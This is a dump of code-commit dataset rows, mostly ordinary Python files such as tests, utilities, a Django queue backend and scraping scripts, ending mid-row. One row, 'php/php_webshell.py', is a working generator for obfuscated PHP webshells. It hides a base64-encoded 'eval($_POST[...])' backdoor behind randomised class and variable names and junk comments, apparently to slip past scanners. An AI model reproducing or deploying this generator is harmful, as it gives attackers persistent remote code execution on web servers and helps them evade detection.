commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
f4202292570eb51e52629ad09280175b42598d52 | Add Divider class | amaotone/murasame | murasame/divider.py | murasame/divider.py | import os
import pandas as pd
from . import CONFIG
conf = CONFIG["divider"]
class Divider(object):
def __init__(self, df, files, base):
self.data = df
self.files = files
self.base = base
self.writers = {}
def _setup_writer(self, outdir):
assert self.files
os.makedirs(outdir, exist_ok=True)
for name in self.files.keys():
path = os.path.join(outdir, name)
self.writers[name] = pd.ExcelWriter(path)
def save(self, outdir):
self._setup_writer(outdir)
for classname, member in self.data.groupby(self.base):
member = member.drop(self.base, axis=1)
for filename, classnames in self.files.items():
if classname in classnames:
target = self.writers[filename]
break
else:
raise RuntimeError
member.to_excel(target, classname, index=False)
for w in self.writers.values():
w.save()
def divider(df):
div = Divider(df, conf["files"], conf["base"])
div.save(conf["out"])
| mit | Python | |
7d987220474d76286c49b5378861854a09798a16 | create project folder | rkastilani/PowerOutagePredictor,rkastilani/PowerOutagePredictor,rkastilani/PowerOutagePredictor | PowerOutagePredictor/Tree/_init_.py | PowerOutagePredictor/Tree/_init_.py | mit | Python | ||
43d9582172cb268f9c2f38f3cd211bbca06b0741 | Create php_webshell.py | hillwah/webshell,360sec/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,360sec/webshell,360sec/webshell,tennc/webshell,360sec/webshell,tennc/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,tennc/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,hillwah/webshell,tennc/webshell,tennc/webshell,hillwah/webshell,hillwah/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,hillwah/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,360sec/webshell | php/php_webshell.py | php/php_webshell.py | import random
#author: pureqh
#github: https://github.com/pureqh/webshell
shell = '''<?php
class {0}{3}
public ${1} = null;
public ${2} = null;
public ${6} = null;
function __construct(){3}
$this->{1} = 'ZXZhbCgkX1BPU';
$this->{6} = '1RbYV0pOw==';
$this->{2} = @base64_decode($this->{1}.$this->{6});
@eval({5}.$this->{2}.{5});
{4}{4}
new {0}();
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
parameter1 = random_name(5)
parameter2 = random_name(6)
lef = '''{'''
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
parameter3 = random_name(6)
shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt,parameter3)
return shellc
if __name__ == '__main__':
print (build_webshell())
| mit | Python | |
87b597fd5363ca14a8e491ba84bedb4486c6676b | Test __bytes__ special method | jongiddy/jute,jongiddy/jute | python3/jute/test/test_jute_bytes.py | python3/jute/test/test_jute_bytes.py | import unittest
from jute import Interface, Dynamic
class BytesLike(Interface):
def __iter__(self):
"""bytes-like object must be iterable."""
def __bytes__(self):
"""Return bytes representation."""
class BytesTestMixin:
def get_test_object(self):
return object()
def test_bytes(self):
bytes_like = self.get_test_object()
self.assertEqual(bytes(bytes_like), b'foo')
def test_getattr(self):
bytes_like = self.get_test_object()
self.assertEqual(getattr(bytes_like, '__bytes__')(), b'foo')
def test_attribute(self):
bytes_like = self.get_test_object()
self.assertEqual(bytes_like.__bytes__(), b'foo')
class FooBytes(BytesLike.Provider):
def __iter__(self):
return iter(b'foo')
def __bytes__(self):
return b'foo'
class BytesInstanceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return FooBytes()
class BytesInterfaceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return BytesLike(FooBytes())
class FooBytesProxy(Dynamic.Provider):
def provides_interface(self, interface):
return interface.implemented_by(BytesLike)
def __iter__(self):
return iter(b'foo')
def __bytes__(self):
return b'foo'
class BytesDynamicInstanceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return FooBytesProxy()
class BytesDynamicInterfaceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return BytesLike(FooBytesProxy())
# __bytes__ is never optimised away, so generated version works as is
class GeneratedBytes(BytesLike.Provider):
"""A class that generates the __bytes__ method dynamically."""
def __iter__(self):
return iter(b'foo')
def __getattr__(self, name):
if name == '__bytes__':
def f():
return b'foo'
return f
raise AttributeError(name)
class GeneratedBytesInstanceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return GeneratedBytes()
class GeneratedBytesInterfaceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return BytesLike(GeneratedBytes())
| mit | Python | |
5e398ae0d8074a3caf11997884d9f719ef047b15 | Define exception for incorrect arguments | ueg1990/soccer-cli,architv/soccer-cli,Saturn/soccer-cli,thurask/soccer-cli,carlosvargas/soccer-cli | soccer/exceptions.py | soccer/exceptions.py | class IncorrectParametersException(Exception):
pass | mit | Python | |
d7020ccb328747922942c56872bcfbec47d451ae | Add cli command class for delete | bjoernricks/python-quilt,vadmium/python-quilt | quilt/cli/delete.py | quilt/cli/delete.py | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
from quilt.cli.meta import Command
from quilt.delete import Delete
class DeleteCommand(Command):
usage = "%prog delete [-r] [--backup] [patch|-n]"
name = "delete"
def add_args(self, parser):
parser.add_option("-r", help="Remove the deleted patch file from the " \
"patches directory as well.",
action="store_true", dest="remove", default=False)
parser.add_option("-n", help="Delete the next patch after topmost, " \
"rather than the specified or topmost " \
"patch.",
action="store_true", dest="next")
parser.add_option("--backup", help="Rename the patch file to patch~ " \
"rather than deleting it. Ignored if " \
"not used with `-r'.",
action="store_true", default=False, dest="backup")
def run(self, options, args):
delete = Delete(self.get_cwd(), self.get_pc_dir(),
self.get_patches_dir())
delete.deleted_patch.connect(self.deleted_patch)
delete.deleting_patch.connect(self.deleting_patch)
if options.next and len(args) > 0:
parser.print_usage()
sys.exit(1)
if options.next:
delete.delete_next(options.remove, options.remove)
else:
patch = None
if len(args) > 0:
patch = args[0]
delete.delete_patch(patch, options.remove, options.remove)
def deleted_patch(self, patch):
print "Removed patch %s" % patch.get_name()
def deleting_patch(self, patch, applied):
if applied:
print "Removing currently applied patch %s" % patch.get_name()
else:
print "Removing patch %s" % patch.get_name()
| mit | Python | |
8dfd59a639bcf540ea4c5a52e91c5f8a7a198554 | Initialize affineKeyTest | JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials | books/CrackingCodesWithPython/Chapter14/affineKeyTest.py | books/CrackingCodesWithPython/Chapter14/affineKeyTest.py | # This program proves that the keyspace of the affine cipher is limited
# to less than len(SYMBOLS) ^ 2.
import affineCipher, cryptomath
message = 'Make things as simple as possible, but not simpler.'
for keyA in range(2, 80):
key = keyA * len(affineCipher.SYMBOLS) + 1
if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) == 1:
print(keyA, affineCipher.encryptMessage(key, message)) | mit | Python | |
77094bb723d35fd23d909e0c59b712eeb7612495 | Add fibonacci HW | bigfatpanda-training/pandas-practical-python-primer,bigfatpanda-training/pandas-practical-python-primer | training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py | training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py | """
Compute Fibonacci sequence and learn python.
Steve Tapp
"""
import sys
import timeit
fib_seq = [0, 1]
fib_even_sum = 0
for fibnum in range (2, 50):
fib_seq.append(fib_seq[-2] + fib_seq[-1])
print (fibnum, fib_seq[fibnum])
if fib_seq[-1] >= 4000000:
break
if not fib_seq[fibnum] % 2:
print ('even', fib_seq[fibnum])
fib_even_sum += fib_seq[fibnum]
print ('Sum of even fibonacci terms under 4 million is ', fib_even_sum)
| artistic-2.0 | Python | |
b1a851d6f5dd47790459564a55405627d9b7a9e4 | Add news date and title scrapper from ist's news page. | iluxonchik/python-general-repo | scripts/webscraping/ist_news_titles.py | scripts/webscraping/ist_news_titles.py | from urllib.request import urlopen
from bs4 import BeautifulSoup
import sys, io
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,'cp437','backslashreplace')
html = urlopen("http://tecnico.ulisboa.pt/pt/noticias/")
bsObj = BeautifulSoup(html, "html.parser")
for news_wrapper in bsObj.find("div", {"id":"content_wrapper"}).findAll("div", {"class":"news_wrapper"}):
news_grid = news_wrapper.find("div", {"class":"grid_9 omega"})
print("Date: " + news_grid.p.get_text())
print("Title: " + news_grid.h3.a.get_text()) | mit | Python | |
bd9496bf726aff0472a52d6c5e2a0db96f2af8e2 | Add allow_skipped_files option to DJANGO_DEFAULTS | martinogden/djangae,nealedj/djangae,armirusco/djangae,leekchan/djangae,jscissr/djangae,chargrizzle/djangae,chargrizzle/djangae,nealedj/djangae,martinogden/djangae,asendecka/djangae,asendecka/djangae,kirberich/djangae,wangjun/djangae,wangjun/djangae,stucox/djangae,stucox/djangae,pablorecio/djangae,trik/djangae,jscissr/djangae,martinogden/djangae,trik/djangae,SiPiggles/djangae,kirberich/djangae,armirusco/djangae,grzes/djangae,grzes/djangae,grzes/djangae,leekchan/djangae,pablorecio/djangae,leekchan/djangae,nealedj/djangae,wangjun/djangae,pablorecio/djangae,chargrizzle/djangae,trik/djangae,potatolondon/djangae,stucox/djangae,asendecka/djangae,potatolondon/djangae,jscissr/djangae,SiPiggles/djangae,armirusco/djangae,kirberich/djangae,b-cannon/my_djae,SiPiggles/djangae | djangae/core/management/__init__.py | djangae/core/management/__init__.py | import os
import sys
import argparse
import djangae.sandbox as sandbox
from djangae.utils import find_project_root
# Set some Django-y defaults
DJANGO_DEFAULTS = {
"storage_path": os.path.join(find_project_root(), ".storage"),
"port": 8000,
"admin_port": 8001,
"api_port": 8002,
"automatic_restart": "False",
"allow_skipped_files": "True",
}
def _execute_from_command_line(sandbox_name, argv, **sandbox_overrides):
with sandbox.activate(sandbox_name, add_sdk_to_path=True, **sandbox_overrides):
import django.core.management as django_management # Now on the path
return django_management.execute_from_command_line(argv)
def execute_from_command_line(argv=None, **sandbox_overrides):
"""Wraps Django's `execute_from_command_line` to initialize a djangae
sandbox before running a management command.
Note: The '--sandbox' arg must come first. All other args are forwarded to
Django as normal.
"""
argv = argv or sys.argv
parser = argparse.ArgumentParser(prog='manage.py')
parser.add_argument(
'--sandbox', default=sandbox.LOCAL, choices=sandbox.SANDBOXES.keys())
parser.add_argument('args', nargs=argparse.REMAINDER)
namespace = parser.parse_args(argv[1:])
overrides = DJANGO_DEFAULTS
overrides.update(sandbox_overrides)
return _execute_from_command_line(namespace.sandbox, ['manage.py'] + namespace.args, **overrides)
def remote_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the remote sandbox"""
return _execute_from_command_line(sandbox.REMOTE, argv or sys.argv, **sandbox_overrides)
def local_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the local sandbox"""
return _execute_from_command_line(sandbox.LOCAL, argv or sys.argv, **sandbox_overrides)
def test_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the test sandbox"""
return _execute_from_command_line(sandbox.TEST, argv or sys.argv, **sandbox_overrides)
| import os
import sys
import argparse
import djangae.sandbox as sandbox
from djangae.utils import find_project_root
# Set some Django-y defaults
DJANGO_DEFAULTS = {
"storage_path": os.path.join(find_project_root(), ".storage"),
"port": 8000,
"admin_port": 8001,
"api_port": 8002,
"automatic_restart": "False"
}
def _execute_from_command_line(sandbox_name, argv, **sandbox_overrides):
with sandbox.activate(sandbox_name, add_sdk_to_path=True, **sandbox_overrides):
import django.core.management as django_management # Now on the path
return django_management.execute_from_command_line(argv)
def execute_from_command_line(argv=None, **sandbox_overrides):
"""Wraps Django's `execute_from_command_line` to initialize a djangae
sandbox before running a management command.
Note: The '--sandbox' arg must come first. All other args are forwarded to
Django as normal.
"""
argv = argv or sys.argv
parser = argparse.ArgumentParser(prog='manage.py')
parser.add_argument(
'--sandbox', default=sandbox.LOCAL, choices=sandbox.SANDBOXES.keys())
parser.add_argument('args', nargs=argparse.REMAINDER)
namespace = parser.parse_args(argv[1:])
overrides = DJANGO_DEFAULTS
overrides.update(sandbox_overrides)
return _execute_from_command_line(namespace.sandbox, ['manage.py'] + namespace.args, **overrides)
def remote_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the remote sandbox"""
return _execute_from_command_line(sandbox.REMOTE, argv or sys.argv, **sandbox_overrides)
def local_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the local sandbox"""
return _execute_from_command_line(sandbox.LOCAL, argv or sys.argv, **sandbox_overrides)
def test_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the test sandbox"""
return _execute_from_command_line(sandbox.TEST, argv or sys.argv, **sandbox_overrides)
| bsd-3-clause | Python |
6317a43baed719bddd84863b750018a6ef1287b0 | add new test | sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana | test/test_canvas.py | test/test_canvas.py | import sequana.resources.canvas.bar as bar
def test_bar():
data = [
{"name":"A", "data":{"R1":10, "R2":90}},
{"name":"B", "data":{"R1":90, "R2":10}}]
bar.stacked_bar("title", "ACGT", datalist=data)
| bsd-3-clause | Python | |
2d9712f5b1fecb8a1f6c989ed835a9476b5cdab5 | Create MeshTextureCoordinates.py | stgeorges/pythonscripts | MeshTextureCoordinates.py | MeshTextureCoordinates.py | #***********************************************************************************************************#
#********* Get normalized 2-D texture coordinates of a mesh object *****************************************#
#********* by Djordje Spasic *******************************************************************************#
#********* issworld2000@yahoo.com 17-Feb-2015 **************************************************************#
"""
Rhino 5 SR11 (and all older releases) still does not have RhinoScript MeshTextureCoordinates function implemented for PythonScript.
MeshTextureCoordinates returns normalized (between 0 and 1) 2-D texture coordinates of a mesh object.
Small function bellow replicates this functionality.
"""
import rhinoscriptsyntax as rs
def MeshTextureCoordinates(object_id):
meshObj = rs.coercemesh(object_id)
mCoordL = []
for i in range(meshObj.TextureCoordinates.Count):
mCoordL.append(meshObj.TextureCoordinates[i])
return mCoordL
meshId = rs.GetObject("pick up your mesh", 32)
coord = MeshTextureCoordinates(meshId)
print coord
| unlicense | Python | |
ed56dc3fc8411baa5d2948591e9e24fc31b7444d | Add files via upload | josedolz/LiviaNET | src/processLabels.py | src/processLabels.py | """
Copyright (c) 2016, Jose Dolz .All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
Jose Dolz. Dec, 2016.
email: jose.dolz.upv@gmail.com
LIVIA Department, ETS, Montreal.
"""
import sys
import pdb
from os.path import isfile, join
import os
import numpy as np
import nibabel as nib
import scipy.io as sio
from LiviaNet.Modules.IO.loadData import load_nii
from LiviaNet.Modules.IO.loadData import load_matlab
from LiviaNet.Modules.IO.saveData import saveImageAsNifti
from LiviaNet.Modules.IO.saveData import saveImageAsMatlab
# NOTE: Only has been tried on nifti images. However, it should not give any error for Matlab images.
""" To print function usage """
def printUsage(error_type):
if error_type == 1:
print(" ** ERROR!!: Few parameters used.")
else:
print(" ** ERROR!!: ...") # TODO
print(" ******** USAGE ******** ")
print(" --- argv 1: Folder containing label images")
print(" --- argv 2: Folder to save corrected label images")
print(" --- argv 3: Number of expected classes (including background)")
print(" --- argv 4: Image type")
print(" ------------- 0: nifti format")
print(" ------------- 1: matlab format")
def getImageImageList(imagesFolder):
if os.path.exists(imagesFolder):
imageNames = [f for f in os.listdir(imagesFolder) if isfile(join(imagesFolder, f))]
imageNames.sort()
return imageNames
def checkAnotatedLabels(argv):
# Number of input arguments
# 1: Folder containing label images
# 2: Folder to save corrected label images
# 3: Number of expected classes (including background)
# 4: Image type
# 0: nifti format
# 1: matlab format
# Do some sanity checks
if len(argv) < 4:
printUsage(1)
sys.exit()
imagesFolder = argv[0]
imagesFolderdst = argv[1]
numClasses = int(argv[2])
imageType = int(argv[3])
imageNames = getImageImageList(imagesFolder)
printFileNames = False
for i_d in xrange(0, len(imageNames)) :
if imageType == 0:
imageFileName = imagesFolder + '/' + imageNames[i_d]
[imageData,img_proxy] = load_nii(imageFileName, printFileNames)
else:
imageData = load_matlab(imageFileName, printFileNames)
labelsOrig = np.unique(imageData)
if (len(labelsOrig) != numClasses):
print(" WARNING!!!!! Number of expected clases ({}) is different to found labels ({}) ".format(numClasses,len(labelsOrig)))
# Correct labels
labelCorrectedImage = np.zeros(imageData.shape)
for i_l in xrange(0,len(labelsOrig)):
idx = np.where(imageData == labelsOrig[i_l])
labelCorrectedImage[idx] = i_l
print(" ... Saving labels...")
nameToSave = imagesFolderdst + '/' + imageNames[i_d]
if imageType == 0: # nifti
imageTypeToSave = np.dtype(np.int8)
saveImageAsNifti(labelCorrectedImage,
nameToSave,
imageFileName,
imageTypeToSave)
else: # Matlab
# Cast to int8 for saving purposes
saveImageAsMatlab(labelCorrectedImage.astype('int8'),nameToSave)
print " ****************************************** PROCESSING LABELS DONE ******************************************"
if __name__ == '__main__':
checkAnotatedLabels(sys.argv[1:])
| mit | Python | |
0301a96b8c9592c58fe41eded24a39d503f4fcb2 | Create ExtendedJsonRpcApi.py | hal0x2328/neo-python,hal0x2328/neo-python | neo/api/JSONRPC/ExtendedJsonRpcApi.py | neo/api/JSONRPC/ExtendedJsonRpcApi.py | from neo.Core.Blockchain import Blockchain
from neo.api.JSONRPC.JsonRpcApi import JsonRpcApi, JsonRpcError
from neo.Implementations.Wallets.peewee.UserWallet import UserWallet
from neocore.UInt256 import UInt256
import datetime
class ExtendedJsonRpcApi:
"""
Extended JSON-RPC API Methods
"""
def get_node_state(self):
height = Blockchain.Default().Height
headers = Blockchain.Default().HeaderHeight
diff = height - JsonRpcApi.start_height
now = datetime.datetime.utcnow()
difftime = now - JsonRpcApi.start_dt
mins = difftime / datetime.timedelta(minutes=1)
secs = mins * 60
bpm = 0
tps = 0
if diff > 0 and mins > 0:
bpm = diff / mins
tps = Blockchain.Default().TXProcessed / secs
return {
'Progress': [height, "/", headers],
'Block-cache length': Blockchain.Default().BlockCacheCount,
'Blocks since program start': diff,
'Time elapsed (minutes)': mins,
'Blocks per min': bpm,
'TPS': tps
}
def get_tx_history(self):
if JsonRpcApi.wallet:
res = []
for tx in JsonRpcApi.wallet.GetTransactions():
json = tx.ToJson()
tx_id = UInt256.ParseString(json['txid'])
txx, height = Blockchain.Default().GetTransaction(tx_id)
header = Blockchain.Default().GetHeaderByHeight(height)
block_index = header.Index
json['block_index'] = block_index
block_timestamp = header.Timestamp
json['blocktime'] = block_timestamp
res.append(json)
return res
else:
raise JsonRpcError(-400, "Access denied.")
| mit | Python | |
04e7a43c9516fc9834727c3087863c6282da2dbf | Add tests.py to app skeleton. | rapidsms/rapidsms-legacy,rapidsms/rapidsms-legacy,rapidsms/rapidsms-legacy | lib/rapidsms/skeleton/app/tests.py | lib/rapidsms/skeleton/app/tests.py | from rapidsms.tests.scripted import TestScript
from app import App
class TestApp (TestScript):
apps = (App,)
# define your test scripts here.
# e.g.:
#
# testRegister = """
# 8005551212 > register as someuser
# 8005551212 < Registered new user 'someuser' for 8005551212!
# 8005551212 > tell anotheruser what's up??
# 8005550000 < someuser said "what's up??"
# """
#
# You can also do normal unittest.TestCase methods:
#
# def testMyModel (self):
# self.assertEquals(...)
| bsd-3-clause | Python | |
d358bf3f103069c2f5a85da15331f808df746064 | Bump version | walkr/oi,danbob123/oi | oi/version.py | oi/version.py | VERSION = '0.3.0'
| VERSION = '0.2.1'
| mit | Python |
19beca7e8166cbab42937ccbd8e9c705ca4913dd | Bump version | danbob123/oi,walkr/oi | oi/version.py | oi/version.py | VERSION = '0.1.0'
| VERSION = '0.0.1'
| mit | Python |
6f2a9cbf9e571855074e898d22480d61277a3eda | Add experimental polling DB backend. | thread/django-lightweight-queue,thread/django-lightweight-queue,lamby/django-lightweight-queue,prophile/django-lightweight-queue,prophile/django-lightweight-queue | django_lightweight_queue/backends/db.py | django_lightweight_queue/backends/db.py | import time
import datetime
from django.db import connection, models, ProgrammingError
from ..job import Job
class DatabaseBackend(object):
TABLE = 'django_lightweight_queue'
FIELDS = (
models.AutoField(name='id', primary_key=True),
models.CharField(name='queue', max_length=255),
models.TextField(name='data'),
models.DateTimeField(name='created'),
)
def __init__(self):
qn = connection.ops.quote_name
sql = []
for x in self.FIELDS:
sql.append(' '.join((
qn(x.name),
x.db_type(connection=connection),
'PRIMARY KEY' if x.primary_key else '',
)))
cursor = connection.cursor()
cursor.execute('CREATE TABLE IF NOT EXISTS %s (\n%s\n);' % (
qn(self.TABLE),
',\n'.join(sql),
))
try:
cursor.execute('CREATE INDEX %s ON %s (%s, %s)' % (
qn('%s_idx' % self.TABLE),
qn(self.TABLE),
qn('queue'),
qn('created'),
))
except ProgrammingError:
# "IF NOT EXISTS" is not portable, so we just fail to create it
pass
# Don't share connections across fork()
connection.close()
def enqueue(self, job, queue):
cursor = connection.cursor()
cursor.execute("""
INSERT INTO %s (queue, data, created) VALUES (%%s, %%s, %%s)
""" % connection.ops.quote_name(self.TABLE), (
queue,
job.to_json(),
datetime.datetime.utcnow(),
))
def dequeue(self, queue, timeout):
cursor = connection.cursor()
cursor.execute("""
SELECT id, data FROM %s WHERE queue = %%s
ORDER BY created ASC LIMIT 1
""" % connection.ops.quote_name(self.TABLE), (queue,))
try:
id_, data = cursor.fetchall()[0]
except (IndexError, ProgrammingError):
time.sleep(timeout)
return
cursor.execute("""
DELETE FROM %s WHERE id = %%s
""" % connection.ops.quote_name(self.TABLE), (id_,))
try:
return Job.from_json(data)
except TypeError:
pass
| bsd-3-clause | Python | |
2498e40294cf56f40fb869d30844c3a8223267a0 | Create initdb command | okfn/hashtag-listener,okfn/hashtag-listener | initdb.py | initdb.py | #!/usr/bin/env python
from app import db
db.create_all()
| mit | Python | |
3c8eb0563f3997fc068d039b18452eaa98da3122 | Add a script useful for downloading large avatar images from Atom feeds | squirrel2038/thearchdruidreport-archive,squirrel2038/thearchdruidreport-archive,squirrel2038/thearchdruidreport-archive | download_avatars.py | download_avatars.py | #!/usr/bin/env python3
import PIL.Image
import io
import json
import requests
import post_list
import web_cache
# Split this file into two modules, because we need to move web_cache out of
# the way between the two steps. (We want to isolate the avatar HTTP requests)
# into its own thing.
def _make_avatar_url_list():
seen = set()
with open("avatar_urls", "wt") as fp:
for post in post_list.load_posts():
url = "https://thearchdruidreport.blogspot.com/feeds/%s/comments/default" \
"?alt=json&v=2&orderby=published&reverse=false&max-results=1000" % post.postid
js = json.loads(web_cache.get(url).decode("utf8"))
for comment in js["feed"]["entry"]:
(author,) = comment["author"]
avatar = author["gd$image"]
int(avatar["width"])
int(avatar["height"])
src = avatar["src"]
if src not in seen:
seen.add(src)
assert "\n" not in src
fp.write(src + "\n")
def _fetch_avatar_urls():
urls = open("avatar_urls", "r").read().splitlines()
for i, url in enumerate(urls):
print("[%d/%d] fetching %s ..." % (i + 1, len(urls), url))
try:
img = PIL.Image.open(io.BytesIO(web_cache.get(url)))
except:
print("WARNING: Bad avatar URL: %s" % url)
#_make_avatar_url_list()
_fetch_avatar_urls()
| mit | Python | |
7e1ea3516aa6b4d41748a9ae63464a32ff16e018 | Test variable module | raviqqe/tensorflow-extenteten,raviqqe/tensorflow-extenteten | extenteten/variable_test.py | extenteten/variable_test.py | from .util import static_shape, static_rank
from .variable import variable
def test_variable():
shape = [123, 456]
assert static_shape(variable(shape)) == shape
initial = [float(n) for n in shape]
assert static_rank(variable(initial)) == 1
| unlicense | Python | |
1d5d76f0166619f3004adb02a902b0739dc55bd6 | Create balanceamento.py | jeffmorais/estrutura-de-dados | balanceamento.py | balanceamento.py | import unittest
class Pilha():
def __init__(self):
self._lista = []
def vazia(self):
return not bool(self._lista)
def topo(self):
if self._lista:
return self._lista[-1]
raise PilhaVaziaErro()
def empilhar(self, valor):
self._lista.append(valor)
def desempilhar(self):
try:
return self._lista.pop()
except IndexError:
raise PilhaVaziaErro()
class PilhaVaziaErro(Exception):
pass
def bora(cont, teste, pilha):
n = teste[cont]
if n in '{[(':
pilha.empilhar(n)
if n in '}])':
if n == '}' and pilha.desempilhar() != '{':
return False
if n == ']' and pilha.desempilhar() != '[':
return False
if n == ')' and pilha.desempilhar() != '(':
return False
cont = cont + 1
if len(teste) == cont:
if pilha.vazia():
return True
return False
return bora(cont, teste, pilha)
def esta_balanceada(teste):
"""
Função que calcula se expressão possui parenteses, colchetes e chaves balanceados
O Aluno deverá informar a complexidade de tempo e espaço da função
Deverá ser usada como estrutura de dados apenas a pilha feita na aula anterior
:param expressao: string com expressao a ser balanceada
:return: boleano verdadeiro se expressao está balanceada e falso caso contrário
"""
pass
if teste:
pilha = Pilha()
cont = 0
if teste[0] in '}])':
return False
return bora(cont, teste, pilha)
else:
return True
class BalancearTestes(unittest.TestCase):
def test_expressao_vazia(self):
self.assertTrue(esta_balanceada(''))
def test_parenteses(self):
self.assertTrue(esta_balanceada('()'))
def test_chaves(self):
self.assertTrue(esta_balanceada('{}'))
def test_colchetes(self):
self.assertTrue(esta_balanceada('[]'))
def test_todos_caracteres(self):
self.assertTrue(esta_balanceada('({[]})'))
self.assertTrue(esta_balanceada('[({})]'))
self.assertTrue(esta_balanceada('{[()]}'))
def test_chave_nao_fechada(self):
self.assertFalse(esta_balanceada('{'))
def test_colchete_nao_fechado(self):
self.assertFalse(esta_balanceada('['))
def test_parentese_nao_fechado(self):
self.assertFalse(esta_balanceada('('))
def test_chave_nao_aberta(self):
self.assertFalse(esta_balanceada('}{'))
def test_colchete_nao_aberto(self):
self.assertFalse(esta_balanceada(']['))
def test_parentese_nao_aberto(self):
self.assertFalse(esta_balanceada(')('))
def test_falta_de_caracter_de_fechamento(self):
self.assertFalse(esta_balanceada('({[]}'))
def test_falta_de_caracter_de_abertura(self):
self.assertFalse(esta_balanceada('({]})'))
def test_expressao_matematica_valida(self):
self.assertTrue(esta_balanceada('({[1+3]*5}/7)+9'))
def test_char_errado_fechando(self):
self.assertFalse(esta_balanceada('[)'))
if __name__ == '__main__':
unittest.main()
| mit | Python | |
58f85213c72b194fe44da36972436c4e7bbdd681 | add sina http util | AsherYang/ThreeLine,AsherYang/ThreeLine,AsherYang/ThreeLine | server/crawler/sinawb/SinaHttpUtil.py | server/crawler/sinawb/SinaHttpUtil.py | # -*- coding:utf-8 -*-
"""
Author: AsherYang
Email : ouyangfan1991@gmail.com
Date : 2017/11/22
Desc : Sina Http Util 参考 Shserver 微店 OpenRequest.py
"""
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import gzip, json, urllib, urllib2, collections,time,logging
def http_get(url,params={},header={}):
httpUrl=url
if params is not None and len(params)>0:
httpUrl=url+"?"+_encode_params(**params)
httpUrl=httpUrl.replace(': ',':')
httpUrl=httpUrl.replace(', ',',')
httpUrl=httpUrl.replace("'",'"')
print httpUrl
req=urllib2.Request(httpUrl,None,headers=header)
res=urllib2.urlopen(req)
body=_read_body(res)
# check_status(body)
return body
def http_post(url,params={},header={}):
req=urllib2.Request(url)
for k,v in header:
req.add_header(k,v)
res=urllib2.urlopen(req,data=params,header=header)
body=_read_body(res)
# check_status(body)
return body
# def check_status(resJson,statusName="status",code="status_code",reason="status_reason"):
# if(resJson is None ):
# raise OpenError("10001","系统错误,返回的结果为空",None)
# res_dic=json.loads(resJson)
# if(res_dic.get(statusName) is None):
# raise OpenError("10001","系统错误,状态码为空",None)
# status_code=res_dic.get(statusName).get(code)
# status_reason=res_dic.get(statusName).get(reason)
# if(0!=status_code and "0"!=status_code):
# raise OpenError(status_code,status_reason,None)
def _encode_params(**kw):
    """Build a URL-encoded query string from keyword arguments.

    Strings are UTF-8 encoded and percent-quoted; non-string iterables
    contribute one `key=value` pair per element; everything else is
    stringified with str().
    """
    pairs = []
    for key, value in kw.iteritems():
        if isinstance(value, basestring):
            raw = value.encode('utf-8') if isinstance(value, unicode) else value
            pairs.append('%s=%s' % (key, urllib.quote(raw)))
        elif isinstance(value, collections.Iterable):
            for element in value:
                raw = element.encode('utf-8') if isinstance(element, unicode) else str(element)
